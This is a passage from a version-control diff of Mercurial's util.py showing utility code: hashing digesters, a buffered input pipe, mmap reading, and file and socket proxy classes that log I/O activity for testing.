util: deprecate procutil proxy functions (API)...
Yuya Nishihara
r37139:24ab3381 default
@@ -1,3851 +1,3860
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import tempfile
35 35 import time
36 36 import traceback
37 37 import warnings
38 38 import zlib
39 39
40 40 from . import (
41 41 encoding,
42 42 error,
43 43 i18n,
44 44 node as nodemod,
45 45 policy,
46 46 pycompat,
47 47 urllibcompat,
48 48 )
49 49 from .utils import (
50 50 dateutil,
51 51 procutil,
52 52 stringutil,
53 53 )
54 54
55 55 base85 = policy.importmod(r'base85')
56 56 osutil = policy.importmod(r'osutil')
57 57 parsers = policy.importmod(r'parsers')
58 58
59 59 b85decode = base85.b85decode
60 60 b85encode = base85.b85encode
61 61
62 62 cookielib = pycompat.cookielib
63 63 empty = pycompat.empty
64 64 httplib = pycompat.httplib
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def _rapply(f, xs):
139 139 if xs is None:
140 140 # assume None means non-value of optional data
141 141 return xs
142 142 if isinstance(xs, (list, set, tuple)):
143 143 return type(xs)(_rapply(f, x) for x in xs)
144 144 if isinstance(xs, dict):
145 145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 146 return f(xs)
147 147
148 148 def rapply(f, xs):
149 149 """Apply function recursively to every item preserving the data structure
150 150
151 151 >>> def f(x):
152 152 ... return 'f(%s)' % x
153 153 >>> rapply(f, None) is None
154 154 True
155 155 >>> rapply(f, 'a')
156 156 'f(a)'
157 157 >>> rapply(f, {'a'}) == {'f(a)'}
158 158 True
159 159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161 161
162 162 >>> xs = [object()]
163 163 >>> rapply(pycompat.identity, xs) is xs
164 164 True
165 165 """
166 166 if f is pycompat.identity:
167 167 # fast path mainly for py2
168 168 return xs
169 169 return _rapply(f, xs)
170 170
171 171 def bitsfrom(container):
172 172 bits = 0
173 173 for bit in container:
174 174 bits |= bit
175 175 return bits
176 176
177 177 # Python 2.6 still has deprecation warnings enabled by default. We do not
178 178 # want to display anything to standard users, so detect if we are running
179 179 # tests and only use Python deprecation warnings in this case.
180 180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 194 r'mercurial')
195 195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 196 DeprecationWarning, r'mercurial')
197 197
198 198 def nouideprecwarn(msg, version, stacklevel=1):
199 199     """Issue a Python-native deprecation warning
200 200
201 201 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
202 202 """
203 203 if _dowarn:
204 204 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
205 205 " update your code.)") % version
206 206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 207
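# A minimal usage sketch for nouideprecwarn(); the message and version are
# hypothetical. The warning only fires when HGEMITWARNINGS is set (i.e.
# under the test runner):
#
#   nouideprecwarn(b"util.foo() is deprecated, use util.bar()", b"4.6",
#                  stacklevel=2)
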
208 208 DIGESTS = {
209 209 'md5': hashlib.md5,
210 210 'sha1': hashlib.sha1,
211 211 'sha512': hashlib.sha512,
212 212 }
213 213 # List of digest types from strongest to weakest
214 214 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
215 215
216 216 for k in DIGESTS_BY_STRENGTH:
217 217 assert k in DIGESTS
218 218
219 219 class digester(object):
220 220 """helper to compute digests.
221 221
222 222 This helper can be used to compute one or more digests given their name.
223 223
224 224 >>> d = digester([b'md5', b'sha1'])
225 225 >>> d.update(b'foo')
226 226 >>> [k for k in sorted(d)]
227 227 ['md5', 'sha1']
228 228 >>> d[b'md5']
229 229 'acbd18db4cc2f85cedef654fccc4a4d8'
230 230 >>> d[b'sha1']
231 231 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
232 232 >>> digester.preferred([b'md5', b'sha1'])
233 233 'sha1'
234 234 """
235 235
236 236 def __init__(self, digests, s=''):
237 237 self._hashes = {}
238 238 for k in digests:
239 239 if k not in DIGESTS:
240 240 raise error.Abort(_('unknown digest type: %s') % k)
241 241 self._hashes[k] = DIGESTS[k]()
242 242 if s:
243 243 self.update(s)
244 244
245 245 def update(self, data):
246 246 for h in self._hashes.values():
247 247 h.update(data)
248 248
249 249 def __getitem__(self, key):
250 250 if key not in DIGESTS:
251 251             raise error.Abort(_('unknown digest type: %s') % key)
252 252 return nodemod.hex(self._hashes[key].digest())
253 253
254 254 def __iter__(self):
255 255 return iter(self._hashes)
256 256
257 257 @staticmethod
258 258 def preferred(supported):
259 259 """returns the strongest digest type in both supported and DIGESTS."""
260 260
261 261 for k in DIGESTS_BY_STRENGTH:
262 262 if k in supported:
263 263 return k
264 264 return None
265 265
266 266 class digestchecker(object):
267 267 """file handle wrapper that additionally checks content against a given
268 268 size and digests.
269 269
270 270 d = digestchecker(fh, size, {'md5': '...'})
271 271
272 272 When multiple digests are given, all of them are validated.
273 273 """
274 274
275 275 def __init__(self, fh, size, digests):
276 276 self._fh = fh
277 277 self._size = size
278 278 self._got = 0
279 279 self._digests = dict(digests)
280 280 self._digester = digester(self._digests.keys())
281 281
282 282 def read(self, length=-1):
283 283 content = self._fh.read(length)
284 284 self._digester.update(content)
285 285 self._got += len(content)
286 286 return content
287 287
288 288 def validate(self):
289 289 if self._size != self._got:
290 290 raise error.Abort(_('size mismatch: expected %d, got %d') %
291 291 (self._size, self._got))
292 292 for k, v in self._digests.items():
293 293 if v != self._digester[k]:
294 294 # i18n: first parameter is a digest name
295 295 raise error.Abort(_('%s mismatch: expected %s, got %s') %
296 296 (k, v, self._digester[k]))
297 297
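# A minimal usage sketch for digestchecker; the filename is hypothetical and
# the md5 value is that of the 11-byte payload b'hello world':
#
#   fh = open('payload.bin', 'rb')
#   wrapped = digestchecker(fh, 11,
#                           {'md5': '5eb63bbbe01eeed093cb22bb8f5acdc3'})
#   while wrapped.read(4096):
#       pass
#   wrapped.validate()  # raises error.Abort on size or digest mismatch
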
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301 def buffer(sliceable, offset=0, length=None):
302 302 if length is not None:
303 303 return memoryview(sliceable)[offset:offset + length]
304 304 return memoryview(sliceable)[offset:]
305 305
306 306 _chunksize = 4096
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315     This class lets us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322 def __new__(cls, fh):
323 323 # If we receive a fileobjectproxy, we need to use a variation of this
324 324 # class that notifies observers about activity.
325 325 if isinstance(fh, fileobjectproxy):
326 326 cls = observedbufferedinputpipe
327 327
328 328 return super(bufferedinputpipe, cls).__new__(cls)
329 329
330 330 def __init__(self, input):
331 331 self._input = input
332 332 self._buffer = []
333 333 self._eof = False
334 334 self._lenbuf = 0
335 335
336 336 @property
337 337 def hasbuffer(self):
338 338         """True if any data is currently buffered
339 339
340 340         This will be used externally as a pre-step for polling IO. If there
341 341         is already buffered data then no polling should be set in place."""
342 342 return bool(self._buffer)
343 343
344 344 @property
345 345 def closed(self):
346 346 return self._input.closed
347 347
348 348 def fileno(self):
349 349 return self._input.fileno()
350 350
351 351 def close(self):
352 352 return self._input.close()
353 353
354 354 def read(self, size):
355 355 while (not self._eof) and (self._lenbuf < size):
356 356 self._fillbuffer()
357 357 return self._frombuffer(size)
358 358
359 359 def readline(self, *args, **kwargs):
360 360 if 1 < len(self._buffer):
361 361 # this should not happen because both read and readline end with a
362 362             # _frombuffer call that collapses it.
363 363 self._buffer = [''.join(self._buffer)]
364 364 self._lenbuf = len(self._buffer[0])
365 365 lfi = -1
366 366 if self._buffer:
367 367 lfi = self._buffer[-1].find('\n')
368 368 while (not self._eof) and lfi < 0:
369 369 self._fillbuffer()
370 370 if self._buffer:
371 371 lfi = self._buffer[-1].find('\n')
372 372 size = lfi + 1
373 373 if lfi < 0: # end of file
374 374 size = self._lenbuf
375 375 elif 1 < len(self._buffer):
376 376 # we need to take previous chunks into account
377 377 size += self._lenbuf - len(self._buffer[-1])
378 378 return self._frombuffer(size)
379 379
380 380 def _frombuffer(self, size):
381 381 """return at most 'size' data from the buffer
382 382
383 383 The data are removed from the buffer."""
384 384 if size == 0 or not self._buffer:
385 385 return ''
386 386 buf = self._buffer[0]
387 387 if 1 < len(self._buffer):
388 388 buf = ''.join(self._buffer)
389 389
390 390 data = buf[:size]
391 391 buf = buf[len(data):]
392 392 if buf:
393 393 self._buffer = [buf]
394 394 self._lenbuf = len(buf)
395 395 else:
396 396 self._buffer = []
397 397 self._lenbuf = 0
398 398 return data
399 399
400 400 def _fillbuffer(self):
401 401 """read data to the buffer"""
402 402 data = os.read(self._input.fileno(), _chunksize)
403 403 if not data:
404 404 self._eof = True
405 405 else:
406 406 self._lenbuf += len(data)
407 407 self._buffer.append(data)
408 408
409 409 return data
410 410
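# A hedged sketch of the polling pattern bufferedinputpipe enables; 'proc'
# is an assumed subprocess with a stdout pipe:
#
#   pipe = bufferedinputpipe(proc.stdout)
#   if not pipe.hasbuffer:
#       poll([pipe.fileno()])  # only block in poll() when nothing is buffered
#   line = pipe.readline()
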
411 411 def mmapread(fp):
412 412 try:
413 413 fd = getattr(fp, 'fileno', lambda: fp)()
414 414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 415 except ValueError:
416 416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 417 # if the file is empty, and if so, return an empty buffer.
418 418 if os.fstat(fd).st_size == 0:
419 419 return ''
420 420 raise
421 421
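# Illustrative use of mmapread (the filename is hypothetical); empty files
# yield '' instead of an mmap object:
#
#   with open('store/00manifest.i', 'rb') as fp:
#       data = mmapread(fp)  # buffer-like, sliceable without copying
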
422 422 class fileobjectproxy(object):
423 423 """A proxy around file objects that tells a watcher when events occur.
424 424
425 425 This type is intended to only be used for testing purposes. Think hard
426 426 before using it in important code.
427 427 """
428 428 __slots__ = (
429 429 r'_orig',
430 430 r'_observer',
431 431 )
432 432
433 433 def __init__(self, fh, observer):
434 434 object.__setattr__(self, r'_orig', fh)
435 435 object.__setattr__(self, r'_observer', observer)
436 436
437 437 def __getattribute__(self, name):
438 438 ours = {
439 439 r'_observer',
440 440
441 441 # IOBase
442 442 r'close',
443 443             # closed is a property
444 444 r'fileno',
445 445 r'flush',
446 446 r'isatty',
447 447 r'readable',
448 448 r'readline',
449 449 r'readlines',
450 450 r'seek',
451 451 r'seekable',
452 452 r'tell',
453 453 r'truncate',
454 454 r'writable',
455 455 r'writelines',
456 456 # RawIOBase
457 457 r'read',
458 458 r'readall',
459 459 r'readinto',
460 460 r'write',
461 461 # BufferedIOBase
462 462 # raw is a property
463 463 r'detach',
464 464 # read defined above
465 465 r'read1',
466 466 # readinto defined above
467 467 # write defined above
468 468 }
469 469
470 470 # We only observe some methods.
471 471 if name in ours:
472 472 return object.__getattribute__(self, name)
473 473
474 474 return getattr(object.__getattribute__(self, r'_orig'), name)
475 475
476 476 def __nonzero__(self):
477 477 return bool(object.__getattribute__(self, r'_orig'))
478 478
479 479 __bool__ = __nonzero__
480 480
481 481 def __delattr__(self, name):
482 482 return delattr(object.__getattribute__(self, r'_orig'), name)
483 483
484 484 def __setattr__(self, name, value):
485 485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486 486
487 487 def __iter__(self):
488 488 return object.__getattribute__(self, r'_orig').__iter__()
489 489
490 490 def _observedcall(self, name, *args, **kwargs):
491 491 # Call the original object.
492 492 orig = object.__getattribute__(self, r'_orig')
493 493 res = getattr(orig, name)(*args, **kwargs)
494 494
495 495 # Call a method on the observer of the same name with arguments
496 496 # so it can react, log, etc.
497 497 observer = object.__getattribute__(self, r'_observer')
498 498 fn = getattr(observer, name, None)
499 499 if fn:
500 500 fn(res, *args, **kwargs)
501 501
502 502 return res
503 503
504 504 def close(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'close', *args, **kwargs)
507 507
508 508 def fileno(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'fileno', *args, **kwargs)
511 511
512 512 def flush(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'flush', *args, **kwargs)
515 515
516 516 def isatty(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'isatty', *args, **kwargs)
519 519
520 520 def readable(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'readable', *args, **kwargs)
523 523
524 524 def readline(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'readline', *args, **kwargs)
527 527
528 528 def readlines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'readlines', *args, **kwargs)
531 531
532 532 def seek(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'seek', *args, **kwargs)
535 535
536 536 def seekable(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'seekable', *args, **kwargs)
539 539
540 540 def tell(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'tell', *args, **kwargs)
543 543
544 544 def truncate(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'truncate', *args, **kwargs)
547 547
548 548 def writable(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'writable', *args, **kwargs)
551 551
552 552 def writelines(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'writelines', *args, **kwargs)
555 555
556 556 def read(self, *args, **kwargs):
557 557 return object.__getattribute__(self, r'_observedcall')(
558 558 r'read', *args, **kwargs)
559 559
560 560 def readall(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'readall', *args, **kwargs)
563 563
564 564 def readinto(self, *args, **kwargs):
565 565 return object.__getattribute__(self, r'_observedcall')(
566 566 r'readinto', *args, **kwargs)
567 567
568 568 def write(self, *args, **kwargs):
569 569 return object.__getattribute__(self, r'_observedcall')(
570 570 r'write', *args, **kwargs)
571 571
572 572 def detach(self, *args, **kwargs):
573 573 return object.__getattribute__(self, r'_observedcall')(
574 574 r'detach', *args, **kwargs)
575 575
576 576 def read1(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'read1', *args, **kwargs)
579 579
580 580 class observedbufferedinputpipe(bufferedinputpipe):
581 581 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
582 582
583 583 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
584 584 bypass ``fileobjectproxy``. Because of this, we need to make
585 585 ``bufferedinputpipe`` aware of these operations.
586 586
587 587 This variation of ``bufferedinputpipe`` can notify observers about
588 588 ``os.read()`` events. It also re-publishes other events, such as
589 589 ``read()`` and ``readline()``.
590 590 """
591 591 def _fillbuffer(self):
592 592 res = super(observedbufferedinputpipe, self)._fillbuffer()
593 593
594 594 fn = getattr(self._input._observer, r'osread', None)
595 595 if fn:
596 596 fn(res, _chunksize)
597 597
598 598 return res
599 599
600 600 # We use different observer methods because the operation isn't
601 601 # performed on the actual file object but on us.
602 602 def read(self, size):
603 603 res = super(observedbufferedinputpipe, self).read(size)
604 604
605 605 fn = getattr(self._input._observer, r'bufferedread', None)
606 606 if fn:
607 607 fn(res, size)
608 608
609 609 return res
610 610
611 611 def readline(self, *args, **kwargs):
612 612 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
613 613
614 614 fn = getattr(self._input._observer, r'bufferedreadline', None)
615 615 if fn:
616 616 fn(res)
617 617
618 618 return res
619 619
620 620 PROXIED_SOCKET_METHODS = {
621 621 r'makefile',
622 622 r'recv',
623 623 r'recvfrom',
624 624 r'recvfrom_into',
625 625 r'recv_into',
626 626 r'send',
627 627 r'sendall',
628 628 r'sendto',
629 629 r'setblocking',
630 630 r'settimeout',
631 631 r'gettimeout',
632 632 r'setsockopt',
633 633 }
634 634
635 635 class socketproxy(object):
636 636 """A proxy around a socket that tells a watcher when events occur.
637 637
638 638 This is like ``fileobjectproxy`` except for sockets.
639 639
640 640 This type is intended to only be used for testing purposes. Think hard
641 641 before using it in important code.
642 642 """
643 643 __slots__ = (
644 644 r'_orig',
645 645 r'_observer',
646 646 )
647 647
648 648 def __init__(self, sock, observer):
649 649 object.__setattr__(self, r'_orig', sock)
650 650 object.__setattr__(self, r'_observer', observer)
651 651
652 652 def __getattribute__(self, name):
653 653 if name in PROXIED_SOCKET_METHODS:
654 654 return object.__getattribute__(self, name)
655 655
656 656 return getattr(object.__getattribute__(self, r'_orig'), name)
657 657
658 658 def __delattr__(self, name):
659 659 return delattr(object.__getattribute__(self, r'_orig'), name)
660 660
661 661 def __setattr__(self, name, value):
662 662 return setattr(object.__getattribute__(self, r'_orig'), name, value)
663 663
664 664 def __nonzero__(self):
665 665 return bool(object.__getattribute__(self, r'_orig'))
666 666
667 667 __bool__ = __nonzero__
668 668
669 669 def _observedcall(self, name, *args, **kwargs):
670 670 # Call the original object.
671 671 orig = object.__getattribute__(self, r'_orig')
672 672 res = getattr(orig, name)(*args, **kwargs)
673 673
674 674 # Call a method on the observer of the same name with arguments
675 675 # so it can react, log, etc.
676 676 observer = object.__getattribute__(self, r'_observer')
677 677 fn = getattr(observer, name, None)
678 678 if fn:
679 679 fn(res, *args, **kwargs)
680 680
681 681 return res
682 682
683 683 def makefile(self, *args, **kwargs):
684 684 res = object.__getattribute__(self, r'_observedcall')(
685 685 r'makefile', *args, **kwargs)
686 686
687 687 # The file object may be used for I/O. So we turn it into a
688 688 # proxy using our observer.
689 689 observer = object.__getattribute__(self, r'_observer')
690 690 return makeloggingfileobject(observer.fh, res, observer.name,
691 691 reads=observer.reads,
692 692 writes=observer.writes,
693 693 logdata=observer.logdata,
694 694 logdataapis=observer.logdataapis)
695 695
696 696 def recv(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'recv', *args, **kwargs)
699 699
700 700 def recvfrom(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'recvfrom', *args, **kwargs)
703 703
704 704 def recvfrom_into(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'recvfrom_into', *args, **kwargs)
707 707
708 708 def recv_into(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710             r'recv_into', *args, **kwargs)
711 711
712 712 def send(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'send', *args, **kwargs)
715 715
716 716 def sendall(self, *args, **kwargs):
717 717 return object.__getattribute__(self, r'_observedcall')(
718 718 r'sendall', *args, **kwargs)
719 719
720 720 def sendto(self, *args, **kwargs):
721 721 return object.__getattribute__(self, r'_observedcall')(
722 722 r'sendto', *args, **kwargs)
723 723
724 724 def setblocking(self, *args, **kwargs):
725 725 return object.__getattribute__(self, r'_observedcall')(
726 726 r'setblocking', *args, **kwargs)
727 727
728 728 def settimeout(self, *args, **kwargs):
729 729 return object.__getattribute__(self, r'_observedcall')(
730 730 r'settimeout', *args, **kwargs)
731 731
732 732 def gettimeout(self, *args, **kwargs):
733 733 return object.__getattribute__(self, r'_observedcall')(
734 734 r'gettimeout', *args, **kwargs)
735 735
736 736 def setsockopt(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'setsockopt', *args, **kwargs)
739 739
740 740 class baseproxyobserver(object):
741 741 def _writedata(self, data):
742 742 if not self.logdata:
743 743 if self.logdataapis:
744 744 self.fh.write('\n')
745 745 self.fh.flush()
746 746 return
747 747
748 748 # Simple case writes all data on a single line.
749 749 if b'\n' not in data:
750 750 if self.logdataapis:
751 751 self.fh.write(': %s\n' % stringutil.escapedata(data))
752 752 else:
753 753 self.fh.write('%s> %s\n'
754 754 % (self.name, stringutil.escapedata(data)))
755 755 self.fh.flush()
756 756 return
757 757
758 758 # Data with newlines is written to multiple lines.
759 759 if self.logdataapis:
760 760 self.fh.write(':\n')
761 761
762 762 lines = data.splitlines(True)
763 763 for line in lines:
764 764 self.fh.write('%s> %s\n'
765 765 % (self.name, stringutil.escapedata(line)))
766 766 self.fh.flush()
767 767
768 768 class fileobjectobserver(baseproxyobserver):
769 769 """Logs file object activity."""
770 770 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
771 771 logdataapis=True):
772 772 self.fh = fh
773 773 self.name = name
774 774 self.logdata = logdata
775 775 self.logdataapis = logdataapis
776 776 self.reads = reads
777 777 self.writes = writes
778 778
779 779 def read(self, res, size=-1):
780 780 if not self.reads:
781 781 return
782 782 # Python 3 can return None from reads at EOF instead of empty strings.
783 783 if res is None:
784 784 res = ''
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
788 788
789 789 self._writedata(res)
790 790
791 791 def readline(self, res, limit=-1):
792 792 if not self.reads:
793 793 return
794 794
795 795 if self.logdataapis:
796 796 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
797 797
798 798 self._writedata(res)
799 799
800 800 def readinto(self, res, dest):
801 801 if not self.reads:
802 802 return
803 803
804 804 if self.logdataapis:
805 805 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
806 806 res))
807 807
808 808 data = dest[0:res] if res is not None else b''
809 809 self._writedata(data)
810 810
811 811 def write(self, res, data):
812 812 if not self.writes:
813 813 return
814 814
815 815 # Python 2 returns None from some write() calls. Python 3 (reasonably)
816 816 # returns the integer bytes written.
817 817 if res is None and data:
818 818 res = len(data)
819 819
820 820 if self.logdataapis:
821 821 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
822 822
823 823 self._writedata(data)
824 824
825 825 def flush(self, res):
826 826 if not self.writes:
827 827 return
828 828
829 829 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
830 830
831 831 # For observedbufferedinputpipe.
832 832 def bufferedread(self, res, size):
833 833 if not self.reads:
834 834 return
835 835
836 836 if self.logdataapis:
837 837 self.fh.write('%s> bufferedread(%d) -> %d' % (
838 838 self.name, size, len(res)))
839 839
840 840 self._writedata(res)
841 841
842 842 def bufferedreadline(self, res):
843 843 if not self.reads:
844 844 return
845 845
846 846 if self.logdataapis:
847 847 self.fh.write('%s> bufferedreadline() -> %d' % (
848 848 self.name, len(res)))
849 849
850 850 self._writedata(res)
851 851
852 852 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
853 853 logdata=False, logdataapis=True):
854 854 """Turn a file object into a logging file object."""
855 855
856 856 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
857 857 logdata=logdata, logdataapis=logdataapis)
858 858 return fileobjectproxy(fh, observer)
859 859
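# A small sketch of makeloggingfileobject; 'logfh' and 'fh' are assumed,
# already-open file objects. With the default logdataapis=True, the write
# below is logged roughly as "myfile> write(4) -> 4: data":
#
#   proxy = makeloggingfileobject(logfh, fh, b'myfile', logdata=True)
#   proxy.write(b'data')
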
860 860 class socketobserver(baseproxyobserver):
861 861 """Logs socket activity."""
862 862 def __init__(self, fh, name, reads=True, writes=True, states=True,
863 863 logdata=False, logdataapis=True):
864 864 self.fh = fh
865 865 self.name = name
866 866 self.reads = reads
867 867 self.writes = writes
868 868 self.states = states
869 869 self.logdata = logdata
870 870 self.logdataapis = logdataapis
871 871
872 872 def makefile(self, res, mode=None, bufsize=None):
873 873 if not self.states:
874 874 return
875 875
876 876 self.fh.write('%s> makefile(%r, %r)\n' % (
877 877 self.name, mode, bufsize))
878 878
879 879 def recv(self, res, size, flags=0):
880 880 if not self.reads:
881 881 return
882 882
883 883 if self.logdataapis:
884 884 self.fh.write('%s> recv(%d, %d) -> %d' % (
885 885 self.name, size, flags, len(res)))
886 886 self._writedata(res)
887 887
888 888 def recvfrom(self, res, size, flags=0):
889 889 if not self.reads:
890 890 return
891 891
892 892 if self.logdataapis:
893 893 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
894 894 self.name, size, flags, len(res[0])))
895 895
896 896 self._writedata(res[0])
897 897
898 898 def recvfrom_into(self, res, buf, size, flags=0):
899 899 if not self.reads:
900 900 return
901 901
902 902 if self.logdataapis:
903 903 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
904 904 self.name, size, flags, res[0]))
905 905
906 906 self._writedata(buf[0:res[0]])
907 907
908 908 def recv_into(self, res, buf, size=0, flags=0):
909 909 if not self.reads:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
914 914 self.name, size, flags, res))
915 915
916 916 self._writedata(buf[0:res])
917 917
918 918 def send(self, res, data, flags=0):
919 919 if not self.writes:
920 920 return
921 921
922 922         self.fh.write('%s> send(%d, %d) -> %d' % (
923 923             self.name, len(data), flags, res))
924 924 self._writedata(data)
925 925
926 926 def sendall(self, res, data, flags=0):
927 927 if not self.writes:
928 928 return
929 929
930 930 if self.logdataapis:
931 931 # Returns None on success. So don't bother reporting return value.
932 932 self.fh.write('%s> sendall(%d, %d)' % (
933 933 self.name, len(data), flags))
934 934
935 935 self._writedata(data)
936 936
937 937 def sendto(self, res, data, flagsoraddress, address=None):
938 938 if not self.writes:
939 939 return
940 940
941 941 if address:
942 942 flags = flagsoraddress
943 943 else:
944 944 flags = 0
945 945
946 946 if self.logdataapis:
947 947 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
948 948 self.name, len(data), flags, address, res))
949 949
950 950 self._writedata(data)
951 951
952 952 def setblocking(self, res, flag):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
957 957
958 958 def settimeout(self, res, value):
